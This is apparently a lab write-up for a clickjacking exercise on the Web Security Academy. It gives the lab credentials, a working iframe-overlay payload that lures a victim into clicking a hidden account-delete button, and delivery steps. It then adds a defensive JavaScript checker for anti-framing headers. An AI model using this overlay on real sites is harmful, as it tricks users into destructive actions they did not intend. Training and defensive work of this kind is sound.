Basic clickjacking with CSRF token protection
Solution
Log in as user: wiener
L: wiener
P: peter
Prepare the clickjacking payload
I have to adjust the width, height, opacity, top and left values to match the website (the "Click me" text must sit above the delete button)
---
<style>
iframe {
position:relative;
width:1000px;
height: 700px;
opacity: 0.8;
z-index: 2;
}
div {
position:absolute;
top:500px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://0afd004b03f19c76806553f2002800c1.web-security-academy.net/my-account"></iframe>
Deliver exploit to victim
Click "Store" --> "View exploit" --> "Deliver exploit to victim"
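The CSRF token does not stop this because the framed /my-account page loads in the victim's own session with a valid token; what decides whether the page can be framed at all is its response headers. The following added example (not part of the original write-up or the lab) classifies a response's anti-framing policy from Content-Security-Policy frame-ancestors and X-Frame-Options. The function name framingPolicy and the sample header sets are assumptions constructed for illustration.

```javascript
// Added example: classify a response's anti-framing policy from its headers.
// Returns "blocked", "same-origin", "allow-list" or "framable".
function framingPolicy(headers) {
  const h = {}; // header names are case-insensitive
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);

  // CSP frame-ancestors overrides X-Frame-Options. The Report-Only header
  // is never enforced, so it is deliberately not consulted.
  const rank = { framable: 0, 'allow-list': 1, 'same-origin': 2, blocked: 3 };
  let verdict = null;
  for (const policy of (h['content-security-policy'] || '').split(',')) {
    // Within one policy only the first frame-ancestors directive counts.
    const fa = policy.split(';').map((d) => d.trim().toLowerCase().split(/\s+/))
      .find((d) => d[0] === 'frame-ancestors');
    if (!fa) continue;
    const src = fa.slice(1);
    let v = 'allow-list';
    if (src.length === 0 || src.every((s) => s === "'none'")) v = 'blocked';
    else if (src.every((s) => s === "'self'")) v = 'same-origin';
    else if (src.some((s) => ['*', 'http:', 'https:'].includes(s))) v = 'framable';
    // Every policy must permit the embed; report the strictest one
    // (a simplification: allow-lists are not intersected).
    if (verdict === null || rank[v] > rank[verdict]) verdict = v;
  }
  if (verdict !== null) return verdict;

  // X-Frame-Options fallback, following the HTML spec's handling of
  // repeated or conflicting values.
  const xfo = new Set((h['x-frame-options'] || '').split(',')
    .map((s) => s.trim().toLowerCase()).filter(Boolean));
  if (xfo.has('deny')) return 'blocked';
  if (xfo.size > 1 && (xfo.has('sameorigin') || xfo.has('allowall'))) return 'blocked';
  if (xfo.size === 1 && xfo.has('sameorigin')) return 'same-origin';
  return 'framable'; // absent, invalid, or obsolete ALLOW-FROM
}

// Constructed sample responses for an account page (not captured from the lab).
const samples = {
  csrfTokenOnly: { 'Set-Cookie': 'session=abc; Secure; HttpOnly' },
  reportOnly: { 'Content-Security-Policy-Report-Only': "frame-ancestors 'none'" },
  legacyAllowFrom: { 'X-Frame-Options': 'ALLOW-FROM https://partner.example' },
  hardened: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'",
              'X-Frame-Options': 'DENY' },
  cspWins: { 'content-security-policy': "frame-ancestors 'self'", 'X-Frame-Options': 'DENY' },
};
for (const [name, hdrs] of Object.entries(samples)) {
  console.log(name.padEnd(16), framingPolicy(hdrs));
}
```

A response that reports "framable" relies on the CSRF token alone, which is the condition this lab demonstrates.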